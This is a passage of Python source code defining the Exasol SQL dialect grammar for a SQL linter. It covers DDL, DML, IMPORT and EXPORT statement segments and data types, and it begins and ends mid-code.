Delimited(Ref("TableReferenceSegment")),
optional=True,
),
),
Sequence("CHANGE", "OWNER", Ref("NakedIdentifierSegment")),
),
)
@exasol_dialect.segment(replace=True)
class DropSchemaStatementSegment(BaseSegment):
"""A `DROP` statement for EXASOL schema.
https://docs.exasol.com/sql/drop_schema.htm
"""
type = "drop_schema"
is_ddl = True
is_dml = False
is_dql = False
is_dcl = False
match_grammar = Sequence(
"DROP",
Ref.keyword("FORCE", optional=True),
Ref.keyword("VIRTUAL", optional=True),
"SCHEMA",
Ref("IfExistsGrammar", optional=True),
Ref("SchemaReferenceSegment"),
OneOf("RESTRICT", Ref.keyword("CASCADE", optional=True), optional=True),
)
############################
# VIEW
############################
@exasol_dialect.segment()
class ViewReferenceSegment(ansi_dialect.get_segment("ObjectReferenceSegment")): # type: ignore
"""A reference to an schema."""
type = "view_reference"
@exasol_dialect.segment(replace=True)
class CreateViewStatementSegment(BaseSegment):
"""A `CREATE VIEW` statement.
https://docs.exasol.com/sql/create_view.htm
"""
type = "create_view_statement"
is_ddl = True
is_dml = False
is_dql = False
is_dcl = False
match_grammar = StartsWith(
Sequence(
"CREATE",
Ref("OrReplaceGrammar", optional=True),
Ref.keyword("FORCE", optional=True),
"VIEW",
)
)
parse_grammar = Sequence(
"CREATE",
Ref("OrReplaceGrammar", optional=True),
Ref.keyword("FORCE", optional=True),
"VIEW",
Ref("ViewReferenceSegment"),
Bracketed(
Delimited(
Sequence(
Ref("ColumnReferenceSegment"),
Ref("CommentIsGrammar", optional=True),
),
),
optional=True,
),
"AS",
OneOf(
Bracketed(Ref("SelectableGrammar")),
Ref("SelectableGrammar"),
),
Ref("CommentIsGrammar", optional=True),
# TODO: (...) COMMENT IS '...' works, without brackets doesn't work
# COMMENT is matched as an identifier...
)
############################
# TABLE
############################
@exasol_dialect.segment(replace=True)
class CreateTableStatementSegment(BaseSegment):
"""A `CREATE TABLE` statement.
https://docs.exasol.com/sql/create_table.htm
"""
type = "create_table_statement"
is_ddl = True
is_dml = False
is_dql = False
is_dcl = False
match_grammar = StartsWith(
Sequence("CREATE", Ref("OrReplaceGrammar", optional=True), "TABLE")
)
parse_grammar = Sequence(
"CREATE",
Ref("OrReplaceGrammar", optional=True),
"TABLE",
Ref("IfNotExistsGrammar", optional=True),
Ref("TableReferenceSegment"),
OneOf(
# Columns and comment syntax:
Bracketed(
Sequence(
Ref("TableContentDefinitionSegment"),
AnyNumberOf(
Sequence(
Ref("CommaSegment"),
Ref("TableContentDefinitionSegment"),
),
),
Sequence(
Ref("CommaSegment"),
Ref("TableDistributionPartitonClause"),
optional=True,
),
),
),
# Create AS syntax:
Sequence(
"AS",
Ref("SelectableGrammar"),
Sequence(
# TODO: this only works if there are brackets
# around the selectable grammar. this should even
# work without brackets
"WITH",
Ref.keyword("NO", optional=True),
"DATA",
optional=True,
),
),
# Create like syntax
Ref("CreateTableLikeClauseSegment"),
),
Ref("CommentIsGrammar", optional=True),
)
@exasol_dialect.segment()
class TableContentDefinitionSegment(BaseSegment):
"""The table content definition."""
type = "table_content_definition"
match_grammar = OneOf(
Ref("ColumnDefinitionSegment"),
Ref("TableOutOfLineConstraintSegment"),
Ref("CreateTableLikeClauseSegment"),
)
@exasol_dialect.segment()
class ColumnDatatypeSegment(BaseSegment):
"""sequence of column and datatype definition."""
type = "column_datatype_definition"
match_grammar = Sequence(
Ref("SingleIdentifierGrammar"),
Ref("DatatypeSegment"),
)
@exasol_dialect.segment(replace=True)
class DatatypeSegment(BaseSegment):
"""A data type segment.
Supports all Exasol datatypes and their aliases
https://docs.exasol.com/sql_references/data_types/datatypedetails.htm
https://docs.exasol.com/sql_references/data_types/datatypealiases.htm
.
"""
type = "data_type"
match_grammar = OneOf(
# Numeric Data Types
Sequence(
OneOf("DECIMAL", "DEC", "NUMBER", "NUMERIC"),
Bracketed(
Ref("NumericLiteralSegment"),
Sequence(
Ref("CommaSegment"), Ref("NumericLiteralSegment"), optional=True
),
optional=True,
),
),
"BIGINT",
Sequence("DOUBLE", Ref.keyword("PRECISION", optional=True)),
"FLOAT",
"INT",
"INTEGER",
"REAL",
"SHORTINT",
"TINYINT",
"SMALLINT",
OneOf("BOOLEAN", "BOOL"),
OneOf(
"DATE",
Sequence(
"TIMESTAMP", Sequence("WITH", "LOCAL", "TIME", "ZONE", optional=True)
),
),
Sequence(
"INTERVAL",
"YEAR",
Bracketed(Ref("NumericLiteralSegment"), optional=True),
"TO",
"MONTH",
),
Sequence(
"INTERVAL",
"DAY",
Bracketed(Ref("NumericLiteralSegment"), optional=True),
"TO",
"SECOND",
Bracketed(Ref("NumericLiteralSegment"), optional=True),
),
Sequence(
"GEOMETRY",
Bracketed(Ref("NumericLiteralSegment"), optional=True),
),
Sequence(
"HASHTYPE",
Bracketed(
Ref("NumericLiteralSegment"),
OneOf("BIT", "BYTE", optional=True),
optional=True,
),
),
Sequence(
OneOf(
Sequence(
OneOf(
Sequence("CHAR", Ref.keyword("VARYING", optional=True)),
"VARCHAR",
"VARCHAR2",
"NCHAR",
"NVARCHAR",
"NVARCHAR2",
),
Bracketed(
Ref("NumericLiteralSegment"),
OneOf("CHAR", "BYTE", optional=True),
optional=True,
),
),
Sequence("LONG", "VARCHAR"),
Sequence(
"CHARACTER",
Sequence(
OneOf(Sequence("LARGE", "OBJECT"), "VARYING", optional=True),
Bracketed(Ref("NumericLiteralSegment"), optional=True),
),
),
Sequence(
"CLOB",
Bracketed(Ref("NumericLiteralSegment"), optional=True),
),
),
Ref("CharCharacterSetSegment", optional=True),
),
)
@exasol_dialect.segment(replace=True)
class ColumnDefinitionSegment(BaseSegment):
"""Column definition within a `CREATE / ALTER TABLE` statement."""
type = "column_definition"
match_grammar = Sequence(
Ref("ColumnDatatypeSegment"),
Ref("ColumnConstraintSegment", optional=True),
)
@exasol_dialect.segment(replace=True)
class ColumnConstraintSegment(BaseSegment):
"""A column option; each CREATE TABLE column can have 0 or more."""
type = "column_option"
match_grammar = Sequence(
OneOf(
Sequence(
"DEFAULT", OneOf(Ref("LiteralGrammar"), Ref("BareFunctionSegment"))
),
Sequence(
# IDENTITY(1000) or IDENTITY 1000 or IDENTITY
"IDENTITY",
OptionallyBracketed(Ref("NumericLiteralSegment"), optional=True),
),
optional=True,
),
Ref("TableInlineConstraintSegment", optional=True),
Ref("CommentIsGrammar", optional=True),
)
@exasol_dialect.segment()
class TableInlineConstraintSegment(BaseSegment):
"""Inline table constraint for CREATE / ALTER TABLE."""
type = "table_constraint_definition"
match_grammar = StartsWith(
OneOf("CONSTRAINT", "NOT", "NULL", "PRIMARY", "FOREIGN"),
terminator=OneOf("COMMENT", Ref("CommaSegment"), Ref("EndBracketSegment")),
)
parse_grammar = Sequence(
Sequence(
"CONSTRAINT",
AnyNumberOf(
Ref("NakedIdentifierSegment"),
max_times=1,
min_times=0,
# exclude UNRESERVED_KEYWORDS which could used as NakedIdentifier
# to make e.g. `id NUMBER CONSTRAINT PRIMARY KEY` work (which is equal to just
# `id NUMBER PRIMARY KEY`)
exclude=OneOf("NOT", "NULL", "PRIMARY", "FOREIGN"),
),
optional=True,
),
OneOf(
# (NOT) NULL
Sequence(Ref.keyword("NOT", optional=True), "NULL"),
# PRIMARY KEY
Ref("PrimaryKeyGrammar"),
# FOREIGN KEY
Ref("ForeignKeyReferencesClauseGrammar"),
),
Ref("TableConstraintEnableDisableGrammar", optional=True),
)
@exasol_dialect.segment()
class TableOutOfLineConstraintSegment(BaseSegment):
"""Out of line table constraint for CREATE / ALTER TABLE."""
type = "table_constraint_definition"
match_grammar = StartsWith(
OneOf("CONSTRAINT", "PRIMARY", "FOREIGN"),
terminator=OneOf(Ref("CommaSegment"), "DISTRIBUTE", "PARTITION"),
)
parse_grammar = Sequence(
Sequence(
"CONSTRAINT",
AnyNumberOf(
Ref("NakedIdentifierSegment"),
max_times=1,
min_times=0,
# exclude UNRESERVED_KEYWORDS which could used as NakedIdentifier
# to make e.g. `id NUMBER, CONSTRAINT PRIMARY KEY(id)` work (which is equal to just
# `id NUMBER, PRIMARY KEY(id)`)
exclude=OneOf("NOT", "NULL", "PRIMARY", "FOREIGN"),
),
optional=True,
),
OneOf(
# PRIMARY KEY
Sequence(
Ref("PrimaryKeyGrammar"),
Ref("BracketedColumnReferenceListGrammar"),
),
# FOREIGN KEY
Sequence(
Ref("ForeignKeyGrammar"),
Ref("BracketedColumnReferenceListGrammar"),
Ref("ForeignKeyReferencesClauseGrammar"),
),
),
Ref("TableConstraintEnableDisableGrammar", optional=True),
)
@exasol_dialect.segment()
class CreateTableLikeClauseSegment(BaseSegment):
"""`CREATE TABLE` LIKE clause."""
type = "table_like_clause"
match_grammar = Sequence(
"LIKE",
Ref("TableReferenceSegment"),
Bracketed(
AnyNumberOf(
Sequence(
Ref("SingleIdentifierGrammar"),
Ref("AliasExpressionSegment", optional=True),
),
Ref("CommaSegment", optional=True),
min_times=1,
),
optional=True,
),
Sequence(OneOf("INCLUDING", "EXCLUDING"), "DEFAULTS", optional=True),
Sequence(OneOf("INCLUDING", "EXCLUDING"), "IDENTITY", optional=True),
Sequence(OneOf("INCLUDING", "EXCLUDING"), "COMMENTS", optional=True),
)
@exasol_dialect.segment()
class TableDistributionPartitonClause(BaseSegment):
"""`CREATE / ALTER TABLE` distribution / partition clause.
DISTRIBUTE/PARTITION clause doesn't except the identifiers in brackets
"""
type = "table_distribution_partition_clause"
match_grammar = OneOf(
Sequence(
Ref("TableDistributeByGrammar"),
Ref("CommaSegment", optional=True),
Ref("TablePartitionByGrammar", optional=True),
),
Sequence(
Ref("TablePartitionByGrammar"),
Ref("CommaSegment", optional=True),
Ref("TableDistributeByGrammar", optional=True),
),
)
@exasol_dialect.segment(replace=True)
class AlterTableStatementSegment(BaseSegment):
"""`ALTER TABLE` statement."""
type = "alter_table_statement"
is_ddl = True
is_dml = False
is_dql = False
is_dcl = False
match_grammar = StartsWith(Sequence("ALTER", "TABLE"))
parse_grammar = OneOf(
Ref("AlterTableColumnSegment"),
Ref("AlterTableConstraintSegment"),
Ref("AlterTableDistributePartitionSegment"),
)
@exasol_dialect.segment()
class AlterTableColumnSegment(BaseSegment):
"""A `ALTER TABLE` statement to add, modify, drop or rename columns.
https://docs.exasol.com/sql/alter_table(column).htm
"""
type = "alter_table_column_statement"
is_ddl = True
is_dml = False
is_dql = False
is_dcl = False
match_grammar = Sequence(
"ALTER",
"TABLE",
Ref("TableReferenceSegment"),
OneOf(
Ref("AlterTableAddColumnSegment"),
Ref("AlterTableDropColumnSegment"),
Ref("AlterTableModifyColumnSegment"),
Ref("AlterTableRenameColumnSegment"),
Ref("AlterTableAlterColumnSegment"),
),
)
@exasol_dialect.segment()
class AlterTableAddColumnSegment(BaseSegment):
"""ALTER TABLE ADD.."""
type = "alter_table_add_column"
match_grammar = Sequence(
"ADD",
Ref.keyword("COLUMN", optional=True),
Ref("IfNotExistsGrammar", optional=True),
OptionallyBracketed(Ref("ColumnDefinitionSegment")),
)
@exasol_dialect.segment()
class AlterTableDropColumnSegment(BaseSegment):
"""ALTER TABLE DROP.."""
type = "alter_table_drop_column"
match_grammar = Sequence(
"DROP",
Ref.keyword("COLUMN", optional=True),
Ref("IfExistsGrammar", optional=True),
Ref("SingleIdentifierGrammar"),
Sequence("CASCADE", "CONSTRAINTS", optional=True),
)
@exasol_dialect.segment()
class AlterTableModifyColumnSegment(BaseSegment):
"""ALTER TABLE MODIFY.."""
type = "alter_table_modify_column"
match_grammar = Sequence(
"MODIFY",
Ref.keyword("COLUMN", optional=True),
OptionallyBracketed(
Ref("SingleIdentifierGrammar"),
Ref("DatatypeSegment", optional=True),
Ref("ColumnConstraintSegment", optional=True),
),
)
@exasol_dialect.segment()
class AlterTableRenameColumnSegment(BaseSegment):
"""ALTER TABLE RENAME.."""
type = "alter_table_rename_column"
match_grammar = Sequence(
"RENAME",
"COLUMN",
Ref("SingleIdentifierGrammar"),
"TO",
Ref("SingleIdentifierGrammar"),
)
@exasol_dialect.segment()
class AlterTableAlterColumnSegment(BaseSegment):
"""ALTER TABLE ALTER.."""
type = "alter_table_alter_column"
match_grammar = Sequence(
"ALTER",
Ref.keyword("COLUMN", optional=True),
Ref("SingleIdentifierGrammar"),
OneOf(
Sequence(
"SET",
OneOf(
Sequence(
# IDENTITY(1000) or IDENTITY 1000
"IDENTITY",
OptionallyBracketed(Ref("NumericLiteralSegment")),
),
Sequence(
"DEFAULT",
OneOf(Ref("LiteralGrammar"), Ref("BareFunctionSegment")),
),
),
),
Sequence("DROP", OneOf("IDENTITY", "DEFAULT")),
),
)
@exasol_dialect.segment()
class AlterTableConstraintSegment(BaseSegment):
"""A `ALTER TABLE` statement to add, modify, drop or rename constraints.
https://docs.exasol.com/sql/alter_table(constraints).htm
"""
type = "alter_table_constraint_statement"
is_ddl = True
is_dml = False
is_dql = False
is_dcl = False
match_grammar = Sequence(
"ALTER",
"TABLE",
Ref("TableReferenceSegment"),
OneOf(
Sequence("ADD", Ref("TableOutOfLineConstraintSegment")),
Sequence(
"MODIFY",
OneOf(
Sequence("CONSTRAINT", Ref("SingleIdentifierGrammar")),
Ref("PrimaryKeyGrammar"),
),
Ref("TableConstraintEnableDisableGrammar"),
),
Sequence(
"DROP",
OneOf(
Sequence(
"CONSTRAINT",
Ref("IfExistsGrammar", optional=True),
Ref("SingleIdentifierGrammar"),
),
Ref("PrimaryKeyGrammar"),
),
),
Sequence(
"RENAME",
"CONSTRAINT",
Ref("SingleIdentifierGrammar"),
"TO",
Ref("SingleIdentifierGrammar"),
),
),
)
@exasol_dialect.segment()
class AlterTableDistributePartitionSegment(BaseSegment):
"""A `ALTER TABLE` statement to add or drop distribution / partition keys.
https://docs.exasol.com/sql/alter_table(distribution_partitioning).htm
"""
type = "alter_table_distribute_partition_statement"
is_ddl = True
is_dml = False
is_dql = False
is_dcl = False
match_grammar = Sequence(
"ALTER",
"TABLE",
Ref("TableReferenceSegment"),
OneOf(
Ref("TableDistributionPartitonClause"),
Sequence(
"DROP",
OneOf(
Sequence(
Ref.keyword("DISTRIBUTION"),
Ref.keyword("AND", optional=True),
Ref.keyword("PARTITION", optional=True),
),
Sequence(
Ref.keyword("PARTITION"),
Ref.keyword("AND", optional=True),
Ref.keyword("DISTRIBUTION", optional=True),
),
),
"KEYS",
),
),
)
@exasol_dialect.segment()
class DropTableStatementSegment(BaseSegment):
"""A `DROP` table statement.
https://docs.exasol.com/sql/drop_table.htm
"""
type = "drop_table"
match_grammar = StartsWith(Sequence("DROP", "TABLE"))
parse_grammar = Sequence(
"DROP",
"TABLE",
Ref("IfExistsGrammar", optional=True),
Ref("TableReferenceSegment"),
OneOf("RESTRICT", Ref.keyword("CASCADE", optional=True), optional=True),
Sequence("CASCADE", "CONSTRAINTS", optional=True),
)
############################
# RENAME
############################
@exasol_dialect.segment()
class RenameStatementSegment(BaseSegment):
"""`RENAME` statement.
https://docs.exasol.com/sql/rename.htm
"""
type = "rename_statement"
is_ddl = True
is_dml = False
is_dql = False
is_dcl = False
match_grammar = StartsWith("RENAME")
parse_grammar = Sequence(
"RENAME",
OneOf(
"SCHEMA",
"TABLE",
"VIEW",
"FUNCTION",
"SCRIPT",
"USER",
"ROLE",
"CONNECTION",
Sequence("CONSUMER", "GROUP"),
optional=True,
),
Ref("ObjectReferenceSegment"),
"TO",
Ref("ObjectReferenceSegment"),
)
############################
# COMMENT
############################
@exasol_dialect.segment()
class CommentStatementSegment(BaseSegment):
"""`COMMENT` statement.
https://docs.exasol.com/sql/comment.htm
"""
type = "comment_statement"
is_ddl = True
is_dml = False
is_dql = False
is_dcl = False
match_grammar = StartsWith(Sequence("COMMENT", "ON"))
parse_grammar = Sequence(
"COMMENT",
"ON",
OneOf(
Sequence(
Ref.keyword("TABLE", optional=True),
Ref("TableReferenceSegment"),
Sequence("IS", Ref("QuotedLiteralSegment"), optional=True),
Bracketed(
Delimited(
Sequence(
Ref("SingleIdentifierGrammar"),
"IS",
Ref("QuotedLiteralSegment"),
),
),
optional=True,
),
),
Sequence(
OneOf(
"COLUMN",
"SCHEMA",
"FUNCTION",
"SCRIPT",
"USER",
"ROLE",
"CONNECTION",
Sequence("CONSUMER", "GROUP"),
),
Ref("ObjectReferenceSegment"),
"IS",
Ref("QuotedLiteralSegment"),
),
),
)
############################
# INSERT
############################
@exasol_dialect.segment(replace=True)
class InsertStatementSegment(BaseSegment):
"""A `INSERT` statement."""
type = "insert_statement"
is_ddl = False
is_dml = True
is_dql = False
is_dcl = False
match_grammar = StartsWith("INSERT")
parse_grammar = Sequence(
"INSERT",
Ref.keyword("INTO", optional=True),
Ref("TableReferenceSegment"),
AnyNumberOf(
Ref("ValuesInsertClauseSegment"),
Sequence("DEFAULT", "VALUES"),
Ref("SelectableGrammar"),
Ref("BracketedColumnReferenceListGrammar", optional=True),
),
)
@exasol_dialect.segment()
class ValuesInsertClauseSegment(BaseSegment):
"""A `VALUES` clause like in `INSERT`."""
type = "values_insert_clause"
match_grammar = Sequence(
"VALUES",
Delimited(
Bracketed(
Delimited(
Ref("LiteralGrammar"),
Ref("IntervalExpressionSegment"),
Ref("FunctionSegment"),
Ref("BareFunctionSegment"),
"DEFAULT",
Ref("SelectableGrammar"),
ephemeral_name="ValuesClauseElements",
)
),
),
)
############################
# UPDATE
############################
@exasol_dialect.segment(replace=True)
class UpdateStatementSegment(BaseSegment):
"""A `Update` statement.
UPDATE <table name> SET <set clause list> [ WHERE <search condition> ]
https://docs.exasol.com/sql/update.htm
"""
type = "update_statement"
is_ddl = False
is_dml = True
is_dql = False
is_dcl = False
match_grammar = StartsWith("UPDATE")
parse_grammar = Sequence(
"UPDATE",
OneOf(Ref("TableReferenceSegment"), Ref("AliasedTableReferenceGrammar")),
Ref("SetClauseListSegment"),
Ref("FromClauseSegment", optional=True),
Ref("WhereClauseSegment", optional=True),
Ref("PreferringClauseSegment", optional=True),
)
@exasol_dialect.segment(replace=True)
class SetClauseListSegment(BaseSegment):
"""Overwritten from ANSI."""
type = "set_clause_list"
match_grammar = Sequence(
"SET",
Indent,
Delimited(
Ref("SetClauseSegment"),
terminator="FROM",
),
Dedent,
)
@exasol_dialect.segment(replace=True)
class SetClauseSegment(BaseSegment):
"""Overwritten from ANSI."""
type = "set_clause"
match_grammar = Sequence(
Ref("ColumnReferenceSegment"),
Ref("EqualsSegment"),
OneOf(
Ref("ExpressionSegment"), # Maybe add this to ANSI to match math x=x+1
Ref("LiteralGrammar"),
Ref("BareFunctionSegment"),
Ref("FunctionSegment"),
Ref("ColumnReferenceSegment"),
"NULL",
"DEFAULT",
),
)
############################
# MERGE
############################
@exasol_dialect.segment()
class MergeStatementSegment(BaseSegment):
"""`MERGE` statement.
https://docs.exasol.com/sql/merge.htm
"""
type = "merge_statement"
is_ddl = False
is_dml = True
is_dql = False
is_dcl = False
match_grammar = StartsWith(
Sequence("MERGE", "INTO"),
)
parse_grammar = Sequence(
"MERGE",
"INTO",
OneOf(Ref("TableReferenceSegment"), Ref("AliasedTableReferenceGrammar")),
"USING",
OneOf(
Ref("TableReferenceSegment"), # tables/views
Bracketed(
Ref("SelectableGrammar"),
), # subquery
),
Ref("AliasExpressionSegment", optional=True),
Ref("JoinOnConditionSegment"),
OneOf(
Sequence(
Ref("MergeMatchedClauseSegment"),
Ref("MergeNotMatchedClauseSegment", optional=True),
),
Sequence(
Ref("MergeNotMatchedClauseSegment"),
Ref("MergeMatchedClauseSegment", optional=True),
),
),
)
@exasol_dialect.segment()
class MergeMatchedClauseSegment(BaseSegment):
"""The `WHEN MATCHED` clause within a `MERGE` statement."""
type = "merge_when_matched_clause"
match_grammar = StartsWith(
Sequence("WHEN", "MATCHED", "THEN", OneOf("UPDATE", "DELETE")),
terminator=Ref("MergeNotMatchedClauseSegment"),
)
parse_grammar = Sequence(
"WHEN",
"MATCHED",
"THEN",
OneOf(
Ref("MergeUpdateClauseSegment"),
Ref("MergeDeleteClauseSegment"),
),
)
@exasol_dialect.segment()
class MergeNotMatchedClauseSegment(BaseSegment):
"""The `WHEN NOT MATCHED` clause within a `MERGE` statement."""
type = "merge_when_not_matched_clause"
match_grammar = StartsWith(
Sequence(
"WHEN",
"NOT",
"MATCHED",
"THEN",
),
terminator=Ref("MergeMatchedClauseSegment"),
)
parse_grammar = Sequence(
"WHEN",
"NOT",
"MATCHED",
"THEN",
Ref("MergeInsertClauseSegment"),
)
@exasol_dialect.segment()
class MergeUpdateClauseSegment(BaseSegment):
"""`UPDATE` clause within the `MERGE` statement."""
type = "merge_update_clause"
match_grammar = Sequence(
"UPDATE",
Ref("SetClauseListSegment"),
Ref("WhereClauseSegment", optional=True),
)
@exasol_dialect.segment()
class MergeDeleteClauseSegment(BaseSegment):
"""`DELETE` clause within the `MERGE` statement."""
type = "merge_delete_clause"
match_grammar = Sequence(
"DELETE",
Ref("WhereClauseSegment", optional=True),
)
@exasol_dialect.segment()
class MergeInsertClauseSegment(BaseSegment):
"""`INSERT` clause within the `MERGE` statement."""
type = "merge_insert_clause"
match_grammar = Sequence(
"INSERT",
Ref("BracketedColumnReferenceListGrammar", optional=True),
"VALUES",
Bracketed(
Delimited(
OneOf(
"DEFAULT",
Ref("ExpressionSegment"),
),
)
),
Ref("WhereClauseSegment", optional=True),
)
############################
# DELETE
############################
@exasol_dialect.segment(replace=True)
class DeleteStatementSegment(BaseSegment):
"""`DELETE` statement.
https://docs.exasol.com/sql/delete.htm
"""
type = "delete_statement"
is_ddl = False
is_dml = True
is_dql = False
is_dcl = False
match_grammar = StartsWith("DELETE")
parse_grammar = Sequence(
"DELETE",
Ref("StarSegment", optional=True),
"FROM",
OneOf(Ref("TableReferenceSegment"), Ref("AliasedTableReferenceGrammar")),
Ref("WhereClauseSegment", optional=True),
Ref("PreferringClauseSegment", optional=True),
)
############################
# TRUNCATE
############################
@exasol_dialect.segment(replace=True)
class TruncateStatementSegment(BaseSegment):
"""`TRUNCATE TABLE` statement.
https://docs.exasol.com/sql/truncate.htm
"""
type = "truncate_table"
is_ddl = False
is_dml = True
is_dql = False
is_dcl = False
match_grammar = StartsWith(Sequence("TRUNCATE", "TABLE"))
parse_grammar = Sequence(
"TRUNCATE",
"TABLE",
Ref("TableReferenceSegment"),
)
############################
# IMPORT
############################
@exasol_dialect.segment()
class ImportStatementSegment(BaseSegment):
"""`IMPORT` statement.
https://docs.exasol.com/sql/import.htm
"""
type = "import_statement"
is_ddl = False
is_dml = True
is_dql = False
is_dcl = False
match_grammar = StartsWith("IMPORT")
parse_grammar = Sequence(
"IMPORT",
Sequence(
"INTO",
OneOf(
Sequence(
Ref("TableReferenceSegment"),
Bracketed(
Ref("SingleIdentifierListSegment"),
optional=True,
),
),
Bracketed(
Delimited(Ref("ImportColumnsSegment")),
),
),
optional=True,
),
Ref("ImportFromClauseSegment"),
)
@exasol_dialect.segment()
class ExportStatementSegment(BaseSegment):
"""`EXPORT` statement.
https://docs.exasol.com/sql/export.htm
"""
type = "export_statement"
is_ddl = False
is_dml = True
is_dql = False
is_dcl = False
match_grammar = StartsWith("EXPORT")
parse_grammar = Sequence(
"EXPORT",
OneOf(
Sequence(
Ref("TableReferenceSegment"),
Bracketed(
Ref("SingleIdentifierListSegment"),
optional=True,
),
),
Bracketed(
Ref("SelectableGrammar"),
),
),
Ref("ExportIntoClauseSegment"),
)
@exasol_dialect.segment()
class ExportIntoClauseSegment(BaseSegment):
"""EXPORT INTO CLAUSE."""
type = "export_into_clause"
match_grammar = Sequence(
"INTO",
OneOf(
Sequence(
OneOf(
Ref("ImportFromExportIntoDbSrcSegment"),
Ref("ImportFromExportIntoFileSegment"),
),
Ref("RejectClauseSegment", optional=True),
),
Ref("ImportFromExportIntoScriptSegment"),
),
)
@exasol_dialect.segment()
class ImportColumnsSegment(BaseSegment):
"""IMPORT COLUMNS."""
type = "import_columns"
match_grammar = Sequence(
OneOf(
Ref("ColumnDatatypeSegment"),
Ref("CreateTableLikeClauseSegment"),
)
)
@exasol_dialect.segment()
class ImportFromClauseSegment(BaseSegment):
"""IMPORT FROM CLAUSE."""
type = "import_from_clause"
match_grammar = Sequence(
"FROM",
OneOf(
Sequence(
OneOf(
Ref("ImportFromExportIntoDbSrcSegment"),
Ref("ImportFromExportIntoFileSegment"),
),
Ref("ImportErrorsClauseSegment", optional=True),
),
Ref("ImportFromExportIntoScriptSegment"),
),
)
@exasol_dialect.segment()
class ImportFromExportIntoDbSrcSegment(BaseSegment):
"""`IMPORT` from or `EXPORT` to a external database source (EXA,ORA,JDBC)."""
type = "import_export_dbsrc"
match_grammar = StartsWith(
OneOf("EXA", "ORA", "JDBC"),
terminator=OneOf(Ref("ImportErrorsClauseSegment"), Ref("RejectClauseSegment")),
)
parse_grammar = Sequence(
OneOf(
"EXA",
"ORA",
Sequence(
"JDBC",
Sequence(
"DRIVER",
Ref("EqualsSegment"),
Ref("QuotedLiteralSegment"),
),
),
),
Sequence("AT", Ref("ConnectionDefinition")),
OneOf(
Sequence(
"TABLE",
Ref("TableReferenceSegment"),
Bracketed(
Ref("SingleIdentifierListSegment"),
optional=True,
),
Sequence(
# EXPORT only
AnyNumberOf(
OneOf("REPLACE", "TRUNCATE"),
Sequence(
"CREATED",
"BY",
Ref("QuotedLiteralSegment"),
),
max_times=2,
),
optional=True,
),
),
AnyNumberOf(
Sequence(
"STATEMENT",
Ref("QuotedLiteralSegment"),
),
min_times=1,
),
),
)
@exasol_dialect.segment()
class ImportFromExportIntoFileSegment(BaseSegment):
"""`IMPORT` from or `EXPORT` to a file source (FBV,CSV)."""
type = "import_file"
match_grammar = StartsWith(
OneOf("CSV", "FBV", "LOCAL"),
terminator=Ref("ImportErrorsClauseSegment"),
)
parse_grammar = Sequence(
OneOf(
Sequence(
OneOf(
"CSV",
"FBV",
),
AnyNumberOf(
Sequence(
"AT",
Ref("ConnectionDefinition"),
),
AnyNumberOf(
"FILE",
Ref("QuotedLiteralSegment"),
min_times=1,
),
min_times=1,
),
),
Sequence(
"LOCAL",
Ref.keyword("SECURE", optional=True),
OneOf(
"CSV",
"FBV",
),
AnyNumberOf(
"FILE",
Ref("QuotedLiteralSegment"),
min_times=1,
),
),
),
OneOf(
Ref("CSVColumnDefinitionSegment"),
Ref("FBVColumnDefinitionSegment"),
optional=True,
),
Ref("FileOptionSegment", optional=True),
)
@exasol_dialect.segment()
class ImportFromExportIntoScriptSegment(BaseSegment):
"""`IMPORT` from / `EXPORT` to a executed database script."""
type = "import_script"
match_grammar = StartsWith("SCRIPT")
parse_grammar = Sequence(
"SCRIPT",
Ref("ObjectReferenceSegment"),
Sequence("AT", Ref("ConnectionDefinition"), optional=True),
Sequence(
"WITH",
AnyNumberOf(
Sequence(
Ref("ParameterNameSegment"),
Ref("EqualsSegment"),
Ref("LiteralGrammar"),
),
min_times=1,
),
optional=True,
),
)
@exasol_dialect.segment()
class ImportErrorsClauseSegment(BaseSegment):
"""`ERRORS` clause."""
type = "import_errors_clause"
match_grammar = StartsWith(
"ERRORS",
)
parse_grammar = Sequence(
"ERRORS",
"INTO",
Ref("ImportErrorDestinationSegment"),
Bracketed(
Ref("ExpressionSegment"), # maybe wrong implementation?
optional=True,
),
OneOf(
"REPLACE",
"TRUNCATE",
optional=True,
),
Ref("RejectClauseSegment", optional=True),
)
@exasol_dialect.segment()
class ImportErrorDestinationSegment(BaseSegment):
"""Error destination (csv file or table)."""
type = "import_error_destination"
match_grammar = OneOf(
Sequence(
"CSV",
Sequence("AT", Ref("ConnectionDefinition")),
"FILE",
Ref("QuotedLiteralSegment"),
),
Sequence(
"LOCAL",
Ref.keyword("SECURE", optional=True),
"CSV",
"FILE",
Ref("QuotedLiteralSegment"),
),
Sequence(
Ref("TableReferenceSegment"),
),
)
@exasol_dialect.segment()
class RejectClauseSegment(BaseSegment):
"""`REJECT` clause within an import / export statement."""
type = "reject_clause"
match_grammar = StartsWith("REJECT")
parse_grammar = Sequence(
"REJECT",
"LIMIT",
OneOf(
Ref("NumericLiteralSegment"),
"UNLIMITED",
),
Ref.keyword("ERRORS", optional=True),
)
@exasol_dialect.segment()
class CSVColumnDefinitionSegment(BaseSegment):
"""Definition of csv columns within an `IMPORT` / `EXPORT` statement."""
type = "csv_cols"
match_grammar = Bracketed(
Delimited(
Sequence(
OneOf(
Ref("NumericLiteralSegment"),
Sequence(
# Expression 1..3, for col 1, 2 and 3
Ref("NumericLiteralSegment"),
Ref("RangeOperator"),
Ref("NumericLiteralSegment"),
),
),
Sequence(
"FORMAT",
Ref("EqualsSegment"),
Ref("QuotedLiteralSegment"),
optional=True,
),
Sequence(
# EXPORT only
"DELIMIT",
Ref("EqualsSegment"),
OneOf("ALWAYS", "NEVER", "AUTO"),
optional=True,
),
),
)
)
@exasol_dialect.segment()
class FBVColumnDefinitionSegment(BaseSegment):
"""Definition of fbv columns within an `IMPORT` / `EXPORT` statement."""
type = "fbv_cols"
match_grammar = Bracketed(
Delimited(
AnyNumberOf(
# IMPORT vaild: SIZE ,START, FORMAT, PADDING, ALIGN
# EXPORT vaild: SIZE, FORMAT, ALIGN, PADDING
Sequence(
OneOf("SIZE", "START"),
Ref("EqualsSegment"),
Ref("NumericLiteralSegment"),
),
Sequence(
OneOf("FORMAT", "PADDING"),
Ref("EqualsSegment"),
Ref("QuotedLiteralSegment"),
),
Sequence(
"ALIGN",
Ref("EqualsSegment"),
OneOf("LEFT", "RIGHT"),
),
),
)
)
@exasol_dialect.segment()
class FileOptionSegment(BaseSegment):
"""File options."""
type = "file_opts"
match_grammar = AnyNumberOf(
OneOf(
# IMPORT valid: ENCODING, NULL, ROW SEPARATOR, COLUMN SEPARATOR / DELIMITER
# TRIM, LTRIM, RTRIM, SKIP, ROW SIZE
